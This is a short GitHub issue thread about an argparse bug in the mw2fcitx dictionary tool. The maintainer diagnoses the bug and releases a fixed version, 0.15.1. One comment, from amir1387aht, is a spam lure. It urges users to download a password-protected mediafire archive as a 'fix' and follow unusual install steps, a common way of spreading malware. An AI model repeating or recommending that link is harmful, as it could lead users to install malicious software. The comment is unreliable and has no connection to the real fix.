### ISSUE TITLE
mw2fcitx: error: unrecognized arguments: /usr/bin/mw2fcitx

### ISSUE THREAD

**Issue by blackteahamburger** [outloudvi/mw2fcitx#24]
```
$ mw2fcitx
usage: Fetch titles from online and generate a dictionary.
mw2fcitx: error: unrecognized arguments: /usr/bin/mw2fcitx
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by outloudvi** [comment]
Oh, that's an issue!

I had a look at `ArgumentParser` in stdlib and it [does not work *that* way](https://github.com/python/cpython/blob/460ee5b994335994d4b5186c08f44e775b3e55fa/Lib/argparse.py#L1862-L1866).

It should be a quick fix so gimme several minutes...

**Comment by outloudvi** [comment]
mw2fcitx [0.15.1](https://pypi.org/project/mw2fcitx/0.15.1/) should now work.
